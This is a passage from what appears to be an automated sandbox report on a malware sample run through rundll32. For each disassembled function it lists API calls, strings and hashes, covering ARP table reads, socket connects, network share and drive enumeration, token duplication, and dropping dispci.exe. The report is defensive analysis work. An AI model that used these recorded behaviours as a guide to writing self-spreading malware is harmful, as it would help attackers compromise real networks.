                                              • Opcode Fuzzy Hash: b31aeedd5c150575a3ff6330002729709104f7ac0859d38e511542284a03842e
                                              • Instruction Fuzzy Hash: 9C416D71900119FBDF109FA8CC45ADA7BB9FF14754F04C9A5EA49E7190E731EA48CB90
                                              Function 04BF742C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04BF7448
                                              • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 04BF7466
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF746D
                                              • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04BF7486
                                              • wsprintfW.USER32 ref: 04BF74D8
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF7504
                                              • HeapFree.KERNEL32(00000000), ref: 04BF750B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$ProcessTable$AllocFreewsprintf
                                              • String ID: %u.%u.%u.%u
                                              • API String ID: 2259129056-1542503432
                                              • Opcode ID: 6b8dfe25bc873aa6a25a6bd989a0d7ba362b6a861a95bdd02f266ca4e401b411
                                              • Instruction ID: df29f5d8375de43648c067eb60052726d10180b844b389841fc06ab5f3268d5d
                                              • Opcode Fuzzy Hash: 6b8dfe25bc873aa6a25a6bd989a0d7ba362b6a861a95bdd02f266ca4e401b411
                                              • Instruction Fuzzy Hash: EE3198B2900115ABDF118FE9DC849BEBBBCEF49301F140496EA05E7141D678AA05DB70
                                              Function 04BF6E66 Relevance: 13.8, APIs: 11, Instructions: 95memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,771ADF60,771AF380,?,?,04BF6A84,?,?,?), ref: 04BF6E87
                                                • Part of subcall function 04BF6DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6DB5
                                                • Part of subcall function 04BF6DA4: LeaveCriticalSection.KERNEL32(?,?,?,04BF6E98,?,00000000,?,?,04BF6A84,?,?), ref: 04BF6E0C
                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,04BF6A84,?,?,?), ref: 04BF6EB8
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6EC1
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,04BF6A84,?,?,?), ref: 04BF6ED9
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6EDC
                                              • memcpy.MSVCRT ref: 04BF6F0D
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,04BF6A84,?,?,?), ref: 04BF6F26
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F29
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F41
                                              • HeapReAlloc.KERNEL32(00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F48
                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,04BF6A84,?,?,?), ref: 04BF6F6C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                              • String ID:
                                              • API String ID: 1369668251-0
                                              • Opcode ID: bf903822e6bbb57627e3cba6578bab15af70341eaf03f0cb9354d97886544db3
                                              • Instruction ID: 76b97aa7d121323bdf989108bd670948252bb02554c4d2206370d67c1baa0623
                                              • Opcode Fuzzy Hash: bf903822e6bbb57627e3cba6578bab15af70341eaf03f0cb9354d97886544db3
                                              • Instruction Fuzzy Hash: 3D316B71600A04EFDB219FA9CC44E6AB7F9FF89300F004949EA4A87651DB31FA16DF60
                                              Function 04BF10A7 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 100memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 04BF10DD
                                              • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 04BF119F
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF11DC
                                              • HeapFree.KERNEL32(00000000), ref: 04BF11E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                              • String ID: %ALLUSERSPROFILE%$\$dispci.exe
                                              • API String ID: 1077166327-497635308
                                              • Opcode ID: f54c746c6ca7ceac3062dcee8c085312702f2fb41d962d144e53bd44a4a66825
                                              • Instruction ID: bf7c401bafc42a12cea01d2dc2930bef066ccbf09ee908e976bbda9ca6c50ef7
                                              • Opcode Fuzzy Hash: f54c746c6ca7ceac3062dcee8c085312702f2fb41d962d144e53bd44a4a66825
                                              • Instruction Fuzzy Hash: 2131923514020EDADF10AFEC9C99BEA76B8EF04744F1448B5EB09D3191E774AF988B60
                                              Function 04BF77D1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 58sleepthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 04BF781B
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00008B2E,?,00000000,00000000), ref: 04BF783D
                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04BF7848
                                              • Sleep.KERNEL32(0002BF20,?,?), ref: 04BF7874
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ChangeCloseComputerCreateFindNameNotificationSleepThread
                                              • String ID: 0.0.0.0$127.0.0.1$localhost
                                              • API String ID: 3743365020-4042105963
                                              • Opcode ID: 305ddc3b854478b2cda5b043170f1b3cc36ba9c745dffe9534eba7ec2ef577ef
                                              • Instruction ID: c359ff3419c9b473d0a2b05471ff91ae0a1ece9c42c8a11587e9fadd9638cb19
                                              • Opcode Fuzzy Hash: 305ddc3b854478b2cda5b043170f1b3cc36ba9c745dffe9534eba7ec2ef577ef
                                              • Instruction Fuzzy Hash: 6001B5F15001187BF7207BA59C88E6BBA7CDB41B58F1401E9BB0DA3042DE64BD09C9B1
                                              Function 04BFA476 Relevance: 12.1, APIs: 8, Instructions: 86networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 04BFA4A5
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 04BFA4C3
                                              • htons.WS2_32(?), ref: 04BFA4E3
                                              • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 04BFA4F7
                                              • connect.WS2_32(00000000,?,00000010), ref: 04BFA509
                                              • select.WS2_32(00000001,00000000,?,00000000,?), ref: 04BFA536
                                              • __WSAFDIsSet.WS2_32(00000000,?), ref: 04BFA549
                                              • closesocket.WS2_32(00000000), ref: 04BFA557
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                              • String ID:
                                              • API String ID: 1369790671-0
                                              • Opcode ID: d1789b17dc61f876b5088f87a630835f0a8eaded793efff0bfa346a642a9c7fa
                                              • Instruction ID: d42b723de07398904ba373d54503eab1b928c001deaca99915e03bff934e358d
                                              • Opcode Fuzzy Hash: d1789b17dc61f876b5088f87a630835f0a8eaded793efff0bfa346a642a9c7fa
                                              • Instruction Fuzzy Hash: A1314F71900219BFDB10DFA8CC48EEEBBBCEF48314F00456AE65AE3150D7789A558B65
                                              Function 04BF7F04 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameW.KERNEL32(?,?), ref: 04BF7F3B
                                              • wsprintfW.USER32 ref: 04BF7F7F
                                              • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 04BF7F8E
                                              • GetLastError.KERNEL32 ref: 04BF7F99
                                              • GetLastError.KERNEL32 ref: 04BF7FAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                              • String ID: %08X%08X
                                              • API String ID: 4289762557-1563805794
                                              • Opcode ID: 59fcd3a031d5b3fda11b7287e171ad87594887d9ad583bfedf38150ec34132c3
                                              • Instruction ID: 43d8f8af1ac91befd5ded2da5b803578f313049cc1dc66d5481a37aaaa6b92ab
                                              • Opcode Fuzzy Hash: 59fcd3a031d5b3fda11b7287e171ad87594887d9ad583bfedf38150ec34132c3
                                              • Instruction Fuzzy Hash: A3115172A00149ABEF10DBE8DD849EEB7BDEF48304F5005A6E609E3140DB74AE1987B1
                                              Function 04BF75D8 Relevance: 9.1, APIs: 6, Instructions: 103sharememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 04BF75FD
                                              • GlobalAlloc.KERNELBASE(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 04BF7611
                                              • memset.MSVCRT ref: 04BF762C
                                              • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 04BF7640
                                              • GlobalFree.KERNEL32(00000000), ref: 04BF76D9
                                              • WNetCloseEnum.MPR(0000FFFF), ref: 04BF76E2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Enum$Global$AllocCloseFreeOpenResourcememset
                                              • String ID:
                                              • API String ID: 4070278229-0
                                              • Opcode ID: d4a0d48d23470161fe4e0b40253d2dc649e4e771107d24114345e105b53b455f
                                              • Instruction ID: 019f953e22c33a6c14701a1e31003122ea822bec6ddfae2bcd4898235f80b6dd
                                              • Opcode Fuzzy Hash: d4a0d48d23470161fe4e0b40253d2dc649e4e771107d24114345e105b53b455f
                                              • Instruction Fuzzy Hash: F131A671800119FFDF20AF99CC84DAEBBB9FF49304B1180E9E61DA7150DB34AA59DB61
                                              Function 04BF8AB3 Relevance: 9.1, APIs: 6, Instructions: 52memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AD4
                                              • htonl.WS2_32(771B0F00), ref: 04BF8AE1
                                              • inet_ntoa.WS2_32(00000000), ref: 04BF8AE4
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                                • Part of subcall function 04BF641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                                • Part of subcall function 04BF641A: HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 04BF8B02
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 04BF8B09
                                              • LocalFree.KERNEL32(?), ref: 04BF8B1F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                              • String ID:
                                              • API String ID: 3470587009-0
                                              • Opcode ID: d736a23d8c1b6cdde4a70baaf30226ba447c7f42547743a1ec4c0cfd1cdfc0fe
                                              • Instruction ID: f0396b901729b1dd4b5bbb907a088464a959e0bc60cd48c2c4e71ec17331a815
                                              • Opcode Fuzzy Hash: d736a23d8c1b6cdde4a70baaf30226ba447c7f42547743a1ec4c0cfd1cdfc0fe
                                              • Instruction Fuzzy Hash: 7B015EB2A10714ABDB01AFE5DD88D4FB7ACEF483147004859E60AE3201D738FE058AB0
                                              Function 04BFA016 Relevance: 7.6, APIs: 5, Instructions: 90threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 04BFA035
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BFA1D0,00000000), ref: 04BFA03C
                                              • DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04BFA059
                                              • CloseHandle.KERNEL32(?,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA0F5
                                              • CloseHandle.KERNEL32(0000FFFF,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA105
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CloseHandleThreadToken$CurrentDuplicateOpen
                                              • String ID:
                                              • API String ID: 3602278934-0
                                              • Opcode ID: 94d7701b17d3d90bf252811981e0d18f0f14c0011ca65e8eede6092de45b2392
                                              • Instruction ID: 9a8e2c987553c2fb6f5074c486195863ced0b14bd5d700290775235587c1cd4f
                                              • Opcode Fuzzy Hash: 94d7701b17d3d90bf252811981e0d18f0f14c0011ca65e8eede6092de45b2392
                                              • Instruction Fuzzy Hash: 4A217E71504301AAE220EF75DC49E5FBBECEFC9714F00496ABA4DD2051EA74E919CBA2
                                              Function 04BF9376 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFindFileNameW.SHLWAPI(04C07BC8,?,00000000,00000000), ref: 04BF939C
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 04BF93C8
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 04BF93DF
                                              • inet_addr.WS2_32(?), ref: 04BF93E8
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 04BF9418
                                                • Part of subcall function 04BF9332: gethostbyname.WS2_32(04BF93FF), ref: 04BF933B
                                                • Part of subcall function 04BF9332: wsprintfA.USER32 ref: 04BF9365
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
                                              • String ID:
                                              • API String ID: 3160354238-0
                                              • Opcode ID: 5a3765101feccdcb207c6379b4cddada35db28da603d80813c2fe6575e98a952
                                              • Instruction ID: b4698c6cc43ddf96639be886871835187953adfc75482ddcdc94433d59bd650f
                                              • Opcode Fuzzy Hash: 5a3765101feccdcb207c6379b4cddada35db28da603d80813c2fe6575e98a952
                                              • Instruction Fuzzy Hash: 002100B290011CBEEF50DE98DCC4EEE777CEB04364F5042A6F629D2190D674AE499B60
                                              Function 04BF6C5F Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C6F
                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C78
                                              • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C81
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6CAC
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6CAF
                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C29
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C2C
                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C39
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C3C
                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C4E
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C51
                                                • Part of subcall function 04BF6BD1: GetProcessHeap.KERNEL32(00000000,00000000,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C56
                                                • Part of subcall function 04BF6BD1: HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C59
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                              • String ID:
                                              • API String ID: 1652351593-0
                                              • Opcode ID: 9b3d59394eb45107eddb83d06eb07ee1331278b0f8210b34c1c805e766293ff9
                                              • Instruction ID: 85eab68c7f5e844247e5ff23222235139da4dda3a916bc1056f3b4549e92566c
                                              • Opcode Fuzzy Hash: 9b3d59394eb45107eddb83d06eb07ee1331278b0f8210b34c1c805e766293ff9
                                              • Instruction Fuzzy Hash: 9501F671600715ABD720DFAADC90A5BBBECFF88750F00451AEA8AD7740DA74E9058BA4
                                              Function 04BFA420 Relevance: 7.5, APIs: 5, Instructions: 40memorythreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000004,771B0F10,?,00000000,?,?,04BF7B89,000000FF), ref: 04BFA436
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA439
                                              • CreateThread.KERNELBASE(00000000,00000000,04BFA333,00000000,00000000,00000000), ref: 04BFA454
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04BF7B89,000000FF), ref: 04BFA463
                                              • HeapFree.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA466
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocCreateFreeThread
                                              • String ID:
                                              • API String ID: 3966119241-0
                                              • Opcode ID: b3e1dc715f1d17a967ff9547b3f25279d73fc91426e0d57686fe2966dd1ac060
                                              • Instruction ID: 0008cfb47eca793d10f0c01b08741f075482f97f4cb9c88af37eac1165aef1d6
                                              • Opcode Fuzzy Hash: b3e1dc715f1d17a967ff9547b3f25279d73fc91426e0d57686fe2966dd1ac060
                                              • Instruction Fuzzy Hash: 98F030B1500219BFDB10AFE5DC8CD9FBFACEB89794B10446AF60A93200D5789D04CAB0
                                              Function 04BF636B Relevance: 6.1, APIs: 4, Instructions: 66memorythreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLogicalDrives.KERNELBASE ref: 04BF637A
                                              • GetDriveTypeW.KERNELBASE(?), ref: 04BF63B8
                                              • LocalAlloc.KERNEL32(00000040,00000050), ref: 04BF63C7
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF6299,00000000,00000000,00000000), ref: 04BF6404
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                              • String ID:
                                              • API String ID: 2320387513-0
                                              • Opcode ID: 8a09c31f6474d632f4ad09856da87b8df1c7cbeff50e709b0ece0ddf0975e41a
                                              • Instruction ID: 28270ca953f3b5692467c975cc6aea911ec8af08f9d2aa14d97440b78e85079b
                                              • Opcode Fuzzy Hash: 8a09c31f6474d632f4ad09856da87b8df1c7cbeff50e709b0ece0ddf0975e41a
                                              • Instruction Fuzzy Hash: 50119A75A00204AFDB00DF98DC45EAEB7B5FF88710F51C45AEA09EB291D730AA46CB60
                                              Function 04BFA112 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BFA18B
                                              • HeapFree.KERNEL32(00000000), ref: 04BFA194
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BFA199
                                              • HeapFree.KERNEL32(00000000), ref: 04BFA19C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
